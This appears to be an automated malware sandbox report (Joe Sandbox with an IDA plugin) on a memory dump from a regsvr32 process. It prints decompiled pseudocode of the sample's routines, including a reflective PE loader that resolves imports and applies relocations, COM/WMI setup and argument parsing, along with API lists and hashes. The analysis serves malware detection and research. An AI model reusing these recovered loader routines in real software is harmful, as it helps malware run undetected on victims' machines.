                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b953b3
                                                                                                                                                                        0x05b952eb
                                                                                                                                                                        0x05b952eb
                                                                                                                                                                        0x05b952f1
                                                                                                                                                                        0x05b952f3
                                                                                                                                                                        0x05b952f8
                                                                                                                                                                        0x05b952f8
                                                                                                                                                                        0x05b952fa
                                                                                                                                                                        0x05b95329
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b95329
                                                                                                                                                                        0x05b952fc
                                                                                                                                                                        0x05b9518a
                                                                                                                                                                        0x05b9518a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9518a
                                                                                                                                                                        0x05b952db
                                                                                                                                                                        0x05b951de
                                                                                                                                                                        0x05b951ec
                                                                                                                                                                        0x05b951ff
                                                                                                                                                                        0x05b95204
                                                                                                                                                                        0x05b9520a
                                                                                                                                                                        0x05b9520c
                                                                                                                                                                        0x05b95224
                                                                                                                                                                        0x05b95229
                                                                                                                                                                        0x05b95232
                                                                                                                                                                        0x05b95238
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b95238
                                                                                                                                                                        0x05b95214
                                                                                                                                                                        0x05b9521d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b9521d
                                                                                                                                                                        0x05b951b1
                                                                                                                                                                        0x05b951b1
                                                                                                                                                                        0x05b951b7
                                                                                                                                                                        0x05b951b9
                                                                                                                                                                        0x05b951c6
                                                                                                                                                                        0x05b951c8
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b951ca
                                                                                                                                                                        0x05b951ce
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b951ce
                                                                                                                                                                        0x05b951bf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b951bf
                                                                                                                                                                        0x05b95188
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b95113
                                                                                                                                                                        0x05b9511e
                                                                                                                                                                        0x05b95124
                                                                                                                                                                        0x05b95126
                                                                                                                                                                        0x05b953b5
                                                                                                                                                                        0x05b953b9
                                                                                                                                                                        0x05b953be
                                                                                                                                                                        0x05b953c0
                                                                                                                                                                        0x05b953c6
                                                                                                                                                                        0x05b953c6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x05b95126

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$lstrcpy$memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1985475764-0
                                                                                                                                                                        • Opcode ID: 2f576db397b43633e7f97526e30c01479f83d3229e44e2972761f6df70f8b44c
                                                                                                                                                                        • Instruction ID: 2a24e29c16fc47b6c4cc5f132ab0bb96266b8494f3ce8510a0f9dccaf9b5d8c7
                                                                                                                                                                        • Opcode Fuzzy Hash: 2f576db397b43633e7f97526e30c01479f83d3229e44e2972761f6df70f8b44c
                                                                                                                                                                        • Instruction Fuzzy Hash: AA81D1717483009BDB2AEB20E849FBA77E6EF85310F2445BDF456872D0EF70B8458A91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                        			E05B9DE26(WCHAR* __ecx) {
                                                                                                                                                                        				int _v8;
                                                                                                                                                                        				WCHAR* _v12;
                                                                                                                                                                        				WCHAR* _v16;
                                                                                                                                                                        				WCHAR* _v140;
                                                                                                                                                                        				WCHAR* _v144;
                                                                                                                                                                        				short _v664;
                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                        				signed int _t30;
                                                                                                                                                                        				WCHAR* _t36;
                                                                                                                                                                        				int _t40;
                                                                                                                                                                        				signed int _t41;
                                                                                                                                                                        				int _t44;
                                                                                                                                                                        				signed int _t45;
                                                                                                                                                                        				WCHAR* _t49;
                                                                                                                                                                        				signed int _t51;
                                                                                                                                                                        				WCHAR* _t52;
                                                                                                                                                                        				void* _t53;
                                                                                                                                                                        
                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                        				_v16 = __ecx;
                                                                                                                                                                        				_t51 = 0;
                                                                                                                                                                        				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v8);
                                                                                                                                                                        				_t44 = _v8;
                                                                                                                                                                        				_t41 = 0;
                                                                                                                                                                        				_v12 = _t28;
                                                                                                                                                                        				if(_t44 <= 0) {
                                                                                                                                                                        					L22:
                                                                                                                                                                        					_t29 = _t28 | 0xffffffff;
                                                                                                                                                                        					__eflags = _t29;
                                                                                                                                                                        					return _t29;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					goto L1;
                                                                                                                                                                        				}
                                                                                                                                                                        				do {
                                                                                                                                                                        					L1:
                                                                                                                                                                        					_t49 =  *(_t28 + _t41 * 4);
                                                                                                                                                                        					_t30 =  *_t49 & 0x0000ffff;
                                                                                                                                                                        					if(_t30 != 0 && _t30 != 0xd && _t30 != 0xa && _t30 != 0x2d && _t30 != 0x2f && _t51 < 0x20) {
                                                                                                                                                                        						 *(_t53 + _t51 * 4 - 0x8c) = _t49;
                                                                                                                                                                        						_t40 = lstrlenW(_t49);
                                                                                                                                                                        						_t45 = 0;
                                                                                                                                                                        						if(_t40 <= 0) {
                                                                                                                                                                        							L11:
                                                                                                                                                                        							_t44 = _v8;
                                                                                                                                                                        							_t51 = _t51 + 1;
                                                                                                                                                                        							goto L12;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							goto L8;
                                                                                                                                                                        						}
                                                                                                                                                                        						do {
                                                                                                                                                                        							L8:
                                                                                                                                                                        							if(_t49[_t45] == 0x2c) {
                                                                                                                                                                        								_t49[_t45] = 0;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t45 = _t45 + 1;
                                                                                                                                                                        						} while (_t45 < _t40);
                                                                                                                                                                        						goto L11;
                                                                                                                                                                        					}
                                                                                                                                                                        					L12:
                                                                                                                                                                        					_t28 = _v12;
                                                                                                                                                                        					_t41 = _t41 + 1;
                                                                                                                                                                        				} while (_t41 < _t44);
                                                                                                                                                                        				if(_t51 != 1) {
                                                                                                                                                                        					if(__eflags <= 0) {
                                                                                                                                                                        						goto L22;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t52 = _v140;
                                                                                                                                                                        					L17:
                                                                                                                                                                        					if( *_t52 == 0x5c || _t52[1] == 0x3a) {
                                                                                                                                                                        						lstrcpynW(_v16, _t52, 0x104);
                                                                                                                                                                        					} else {
                                                                                                                                                                        						GetCurrentDirectoryW(0x104,  &_v664);
                                                                                                                                                                        						_push(0);
                                                                                                                                                                        						_push(_t52);
                                                                                                                                                                        						_push(0x5bac9a0);
                                                                                                                                                                        						_t36 = E05B99A5A( &_v664);
                                                                                                                                                                        						_v12 = _t36;
                                                                                                                                                                        						lstrcpynW(_v16, _t36, 0x104);
                                                                                                                                                                        						E05B98BF4( &_v12, 0xfffffffe);
                                                                                                                                                                        					}
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t52 = _v144;
                                                                                                                                                                        				goto L17;
                                                                                                                                                                        			}






















                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCommandLineW.KERNEL32 ref: 05B9DE3B
                                                                                                                                                                        • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 05B9DE46
                                                                                                                                                                        • lstrlenW.KERNEL32 ref: 05B9DE88
                                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 05B9DEE1
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 05B9DF06
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000104), ref: 05B9DF24
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1259063344-0
                                                                                                                                                                        • Opcode ID: 6fb362eb8e16c616ce1006c21553005c13df6d66510747c925cec277b5dd24e5
                                                                                                                                                                        • Instruction ID: 3baeab418901cbaeebf7c4cb30cea1707373ae13c5b9ff57ca3cc669df847e7e
                                                                                                                                                                        • Opcode Fuzzy Hash: 6fb362eb8e16c616ce1006c21553005c13df6d66510747c925cec277b5dd24e5
                                                                                                                                                                        • Instruction Fuzzy Hash: E831CF71904516EFDF28AB5AC889AAEB7B9FF15350F1144ADF406E3054EB70BA808B50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 05B9E66A
                                                                                                                                                                        • SysAllocString.OLEAUT32(?), ref: 05B9E672
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 05B9E686
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 05B9E701
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 05B9E704
                                                                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 05B9E709
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: String$AllocFree
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 344208780-0
                                                                                                                                                                        • Opcode ID: b531c44483eb40dabba51ad15752e3f9380ac5a4f5b12a2da19870b20d45a502
                                                                                                                                                                        • Instruction ID: 11b8b688de6a673687aa13aeec687915ea0460c0adc4d5dbc1d7fb97113eb0ee
                                                                                                                                                                        • Opcode Fuzzy Hash: b531c44483eb40dabba51ad15752e3f9380ac5a4f5b12a2da19870b20d45a502
                                                                                                                                                                        • Instruction Fuzzy Hash: 0B211C75900218AFDF04DFA8CC88DAEBBBDFF48654B1044A9F505E7240DA71AE01CB60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 20%
                                                                                                                                                                        			E05BA3D66(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
                                                                                                                                                                        				signed int _v5;
                                                                                                                                                                        				signed short _v12;
                                                                                                                                                                        				intOrPtr* _v16;
                                                                                                                                                                        				intOrPtr _v20;
                                                                                                                                                                        				signed int* _v24;
                                                                                                                                                                        				unsigned int _v28;
                                                                                                                                                                        				signed short* _v32;
                                                                                                                                                                        				struct HINSTANCE__* _v36;
                                                                                                                                                                        				signed int _v40;
                                                                                                                                                                        				signed int _v44;
                                                                                                                                                                        				intOrPtr* _v48;
                                                                                                                                                                        				signed short* _v52;
                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                        				unsigned int _v60;
                                                                                                                                                                        				intOrPtr _v64;
                                                                                                                                                                        				_Unknown_base(*)()* _v68;
                                                                                                                                                                        				signed int _v72;
                                                                                                                                                                        				intOrPtr _v76;
                                                                                                                                                                        				intOrPtr _v80;
                                                                                                                                                                        				intOrPtr _v84;
                                                                                                                                                                        				unsigned int _v88;
                                                                                                                                                                        				intOrPtr _v92;
                                                                                                                                                                        				signed int _v96;
                                                                                                                                                                        				intOrPtr _v100;
                                                                                                                                                                        				intOrPtr _v104;
                                                                                                                                                                        				intOrPtr _v108;
                                                                                                                                                                        				intOrPtr _v112;
                                                                                                                                                                        				CHAR* _v116;
                                                                                                                                                                        				signed int _v120;
                                                                                                                                                                        				intOrPtr _v124;
                                                                                                                                                                        				signed int _v128;
                                                                                                                                                                        				signed int _v132;
                                                                                                                                                                        				signed int _t216;
                                                                                                                                                                        				signed int _t233;
                                                                                                                                                                        				void* _t273;
                                                                                                                                                                        				signed int _t278;
                                                                                                                                                                        				signed int _t280;
                                                                                                                                                                        				intOrPtr _t320;
                                                                                                                                                                        
                                                                                                                                                                        				_v44 = _v44 & 0x00000000;
                                                                                                                                                                        				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                                                                                                                                                        				_v20 = _v84;
                                                                                                                                                                        				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
                                                                                                                                                                        				_v64 = _t320;
                                                                                                                                                                        				if(_t320 == 0) {
                                                                                                                                                                        					L13:
                                                                                                                                                                        					while(0 != 0) {
                                                                                                                                                                        					}
                                                                                                                                                                        					_push(8);
                                                                                                                                                                        					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
                                                                                                                                                                        						L35:
                                                                                                                                                                        						if(_a16 == 0) {
                                                                                                                                                                        							L54:
                                                                                                                                                                        							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
                                                                                                                                                                        							while(0 != 0) {
                                                                                                                                                                        							}
                                                                                                                                                                        							if(_a12 != 0) {
                                                                                                                                                                        								 *_a12 = _v80;
                                                                                                                                                                        							}
                                                                                                                                                                        							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
                                                                                                                                                                        							_v124 = _v80(_a4, 1, _a8);
                                                                                                                                                                        							while(0 != 0) {
                                                                                                                                                                        							}
                                                                                                                                                                        							if(_v124 != 0) {
                                                                                                                                                                        								if(_v44 == 0) {
                                                                                                                                                                        									L77:
                                                                                                                                                                        									return 1;
                                                                                                                                                                        								}
                                                                                                                                                                        								if(_a20 != 1) {
                                                                                                                                                                        									if(_a20 != 2) {
                                                                                                                                                                        										L75:
                                                                                                                                                                        										while(0 != 0) {
                                                                                                                                                                        										}
                                                                                                                                                                        										goto L77;
                                                                                                                                                                        									}
                                                                                                                                                                        									while(0 != 0) {
                                                                                                                                                                        									}
                                                                                                                                                                        									_v132 = _v44;
                                                                                                                                                                        									goto L75;
                                                                                                                                                                        								}
                                                                                                                                                                        								while(0 != 0) {
                                                                                                                                                                        								}
                                                                                                                                                                        								_v44();
                                                                                                                                                                        								goto L75;
                                                                                                                                                                        							}
                                                                                                                                                                        							while(0 != 0) {
                                                                                                                                                                        							}
                                                                                                                                                                        							return 0;
                                                                                                                                                                        						}
                                                                                                                                                                        						while(0 != 0) {
                                                                                                                                                                        						}
                                                                                                                                                                        						_push(8);
                                                                                                                                                                        						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
                                                                                                                                                                        							goto L54;
                                                                                                                                                                        						}
                                                                                                                                                                        						_v128 = 0x80000000;
                                                                                                                                                                        						_t216 = 8;
                                                                                                                                                                        						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
                                                                                                                                                                        						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
                                                                                                                                                                        						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
                                                                                                                                                                        						_v104 =  *((intOrPtr*)(_v76 + 0x18));
                                                                                                                                                                        						while(0 != 0) {
                                                                                                                                                                        						}
                                                                                                                                                                        						_v40 = _v40 & 0x00000000;
                                                                                                                                                                        						while(_v40 < _v104) {
                                                                                                                                                                        							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
                                                                                                                                                                        							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
                                                                                                                                                                        							if(lstrcmpA(_v116, _a16) != 0) {
                                                                                                                                                                        								_v40 = _v40 + 1;
                                                                                                                                                                        								continue;
                                                                                                                                                                        							}
                                                                                                                                                                        							while(0 != 0) {
                                                                                                                                                                        							}
                                                                                                                                                                        							_v44 = _v120;
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_v44 != 0) {
                                                                                                                                                                        							goto L54;
                                                                                                                                                                        						}
                                                                                                                                                                        						while(0 != 0) {
                                                                                                                                                                        						}
                                                                                                                                                                        						return 0xffffffff;
                                                                                                                                                                        					}
                                                                                                                                                                        					_v96 = 0x80000000;
                                                                                                                                                                        					_t233 = 8;
                                                                                                                                                                        					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
                                                                                                                                                                        					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
                                                                                                                                                                        						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                                                                                                                                                        						if(_v36 == 0) {
                                                                                                                                                                        							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_v36 != 0) {
                                                                                                                                                                        							if( *_v16 == 0) {
                                                                                                                                                                        								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								_v24 =  *_v16 + _a4;
                                                                                                                                                                        							}
                                                                                                                                                                        							_v72 = _v72 & 0x00000000;
                                                                                                                                                                        							while( *_v24 != 0) {
                                                                                                                                                                        								if(( *_v24 & _v96) == 0) {
                                                                                                                                                                        									_v100 =  *_v24 + _a4;
                                                                                                                                                                        									_v68 = GetProcAddress(_v36, _v100 + 2);
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
                                                                                                                                                                        								}
                                                                                                                                                                        								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
                                                                                                                                                                        									 *_v24 = _v68;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
                                                                                                                                                                        								}
                                                                                                                                                                        								_v24 =  &(_v24[1]);
                                                                                                                                                                        								_v72 = _v72 + 4;
                                                                                                                                                                        							}
                                                                                                                                                                        							_v16 = _v16 + 0x14;
                                                                                                                                                                        							continue;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t273 = 0xfffffffd;
                                                                                                                                                                        							return _t273;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L35;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t278 = 8;
                                                                                                                                                                        				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
                                                                                                                                                                        				_t280 = 8;
                                                                                                                                                                        				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
                                                                                                                                                                        				while(0 != 0) {
                                                                                                                                                                        				}
                                                                                                                                                                        				while(_v56 > 0) {
                                                                                                                                                                        					_v28 = _v52[2];
                                                                                                                                                                        					_v56 = _v56 - _v28;
                                                                                                                                                                        					_v28 = _v28 - 8;
                                                                                                                                                                        					_v28 = _v28 >> 1;
                                                                                                                                                                        					_v32 =  &(_v52[4]);
                                                                                                                                                                        					_v92 = _a4 +  *_v52;
                                                                                                                                                                        					_v60 = _v28;
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						_v88 = _v60;
                                                                                                                                                                        						_v60 = _v60 - 1;
                                                                                                                                                                        						if(_v88 == 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
                                                                                                                                                                        						_v12 =  *_v32 & 0xfff;
                                                                                                                                                                        						_v48 = (_v12 & 0x0000ffff) + _v92;
                                                                                                                                                                        						if((_v5 & 0x000000ff) != 3) {
                                                                                                                                                                        							if((_v5 & 0x000000ff) == 0xa) {
                                                                                                                                                                        								 *_v48 =  *_v48 + _v64;
                                                                                                                                                                        							}
                                                                                                                                                                        						} else {
                                                                                                                                                                        							 *_v48 =  *_v48 + _v64;
                                                                                                                                                                        						}
                                                                                                                                                                        						_v32 =  &(_v32[1]);
                                                                                                                                                                        					}
                                                                                                                                                                        					_v52 = _v32;
                                                                                                                                                                        				}
                                                                                                                                                                        				goto L13;
                                                                                                                                                                        			}










































                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 05BA3ECD
                                                                                                                                                                        • LoadLibraryA.KERNEL32(00000000), ref: 05BA3EE6
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 05BA3F42
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 05BA3F61
                                                                                                                                                                        • lstrcmpA.KERNEL32(?,00000000), ref: 05BA4052
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1872726118-0
                                                                                                                                                                        • Opcode ID: 75ec2ab1fc016b971d0e33d31b8cfeb280cb37257922d224da30af3a5f0fa846
                                                                                                                                                                        • Instruction ID: 138315b4f1ca1ab1b940ef9cc2deafd5dee983a2a8db1ddbbd6d1915d8b43622
                                                                                                                                                                        • Opcode Fuzzy Hash: 75ec2ab1fc016b971d0e33d31b8cfeb280cb37257922d224da30af3a5f0fa846
                                                                                                                                                                        • Instruction Fuzzy Hash: BDE1A276A18209DFCF24CFA8C581AADBBF1FF08314F1485AAE816EB351D774A941DB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: @$\u%04X$\u%04X\u%04X
                                                                                                                                                                        • API String ID: 0-2132903582
                                                                                                                                                                        • Opcode ID: 31570e814882396d159f4280f4380ea12fe7f4c4e2b82c04bd1ae1ad075d2b98
                                                                                                                                                                        • Instruction ID: ea4e459880541c5c0e8521380c4f4c5784172dc6f25e87b333f5356cb34cf72d
                                                                                                                                                                        • Opcode Fuzzy Hash: 31570e814882396d159f4280f4380ea12fe7f4c4e2b82c04bd1ae1ad075d2b98
                                                                                                                                                                        • Instruction Fuzzy Hash: AE41493770C305ABDBA88E6CDD8DBBE3A6AEF80250F5400D6F913D6244E361F951D291
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 30%
                                                                                                                                                                        			E05B9E400(void* __ecx) {
                                                                                                                                                                        				char _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				char* _t15;
                                                                                                                                                                        				intOrPtr* _t16;
                                                                                                                                                                        				void* _t21;
                                                                                                                                                                        				intOrPtr* _t23;
                                                                                                                                                                        				intOrPtr* _t24;
                                                                                                                                                                        				intOrPtr* _t25;
                                                                                                                                                                        				void* _t30;
                                                                                                                                                                        				void* _t33;
                                                                                                                                                                        
                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                        				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                                                                                                                                                                        				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                                                                                                                                                                        				_t15 =  &_v12;
                                                                                                                                                                        				__imp__CoCreateInstance(0x5bac868, 0, 1, 0x5bac878, _t15);
                                                                                                                                                                        				if(_t15 < 0) {
                                                                                                                                                                        					L5:
                                                                                                                                                                        					_t23 = _v8;
                                                                                                                                                                        					if(_t23 != 0) {
                                                                                                                                                                        						 *((intOrPtr*)( *_t23 + 8))(_t23);
                                                                                                                                                                        					}
                                                                                                                                                                        					_t24 = _v12;
                                                                                                                                                                        					if(_t24 != 0) {
                                                                                                                                                                        						 *((intOrPtr*)( *_t24 + 8))(_t24);
                                                                                                                                                                        					}
                                                                                                                                                                        					_t16 = 0;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					__imp__#2(__ecx);
                                                                                                                                                                        					_t25 = _v12;
                                                                                                                                                                        					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                                                                                                                                                                        					if(_t21 < 0) {
                                                                                                                                                                        						goto L5;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                                                                                                                                                                        						if(_t21 < 0) {
                                                                                                                                                                        							goto L5;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							_t16 = E05B98BDE(8);
                                                                                                                                                                        							if(_t16 == 0) {
                                                                                                                                                                        								goto L5;
                                                                                                                                                                        							} else {
                                                                                                                                                                        								 *((intOrPtr*)(_t16 + 4)) = _v12;
                                                                                                                                                                        								 *_t16 = _v8;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t16;
                                                                                                                                                                        			}














                                                                                                                                                                        APIs
                                                                                                                                                                        • CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,05B9E731,000009DA,00000000,?,00000000), ref: 05B9E413
                                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,05B9E731,000009DA,00000000,?,00000000), ref: 05B9E424
                                                                                                                                                                        • CoCreateInstance.OLE32(05BAC868,00000000,00000001,05BAC878,?,?,05B9E731,000009DA,00000000,?,00000000), ref: 05B9E43B
                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 05B9E446
                                                                                                                                                                        • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,05B9E731,000009DA,00000000,?,00000000), ref: 05B9E471
                                                                                                                                                                          • Part of subcall function 05B98BDE: RtlAllocateHeap.NTDLL(00000008,?,?,05B9959D,00000100,?,05B96507), ref: 05B98BEC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001C.00000002.500418821.0000000005B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 05B90000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_28_2_5b90000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1610782348-0
                                                                                                                                                                        • Opcode ID: 83ca1daa55dfd560f23600843320c33468aa34dae47285a0d47517f2e41550ff
                                                                                                                                                                        • Instruction ID: 0265535d101e0eeb3611de91f1f84e73666b52076986f8472b9903a8faeb9c90
                                                                                                                                                                        • Opcode Fuzzy Hash: 83ca1daa55dfd560f23600843320c33468aa34dae47285a0d47517f2e41550ff
                                                                                                                                                                        • Instruction Fuzzy Hash: E821D870614245BBDB288B66DC4EE6FBFBCEFC6F15B1041ACB505A6291DA70EA00D660
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 83%
                                                                                                                                                                        			E05BA3379(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                                                                                                                                                                        				signed int _t12;
                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                        				void* _t30;
                                                                                                                                                                        				char* _t31;
                                                                                                                                                                        				char* _t33;
                                                                                                                                                                        				char* _t35;
                                                                                                                                                                        				char* _t37;
                                                                                                                                                                        				char* _t38;
                                                                                                                                                                        				long long* _t40;
                                                                                                                                                                        
                                                                                                                                                                        				_t30 = __edi;
                                                                                                                                                                        				_t12 = _a20;
                                                                                                                                                                        				if(_t12 == 0) {
                                                                                                                                                                        					_t12 = 0x11;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t35 = _a4;
                                                                                                                                                                        				_push(_t25);
                                                                                                                                                                        				 *_t40 = _a12;
                                                                                                                                                                        				_push(_t12);
                                                                                                                                                                        				_push("%.*g");
                                                                                                                                                                        				_push(_a8);
                                                                                                                                                                        				_push(_t35);
                                                                                                                                                                        				L05BA34D2();
                                                                                                                                                                        				_t23 = _t12;
                                                                                                                                                                        				if(_t23 < 0 || _t23 >= _a8) {
                                                                                                                                                                        					L16:
                                                                                                                                                                        					_t13 = _t12 | 0xffffffff;
                                                                                                                                                                        					goto L17;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					E05BA3352(_t12, _t35);
                                                                                                                                                                        					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
                                                                                                                                                                        						L8:
                                                                                                                                                                        						_push(_t30);
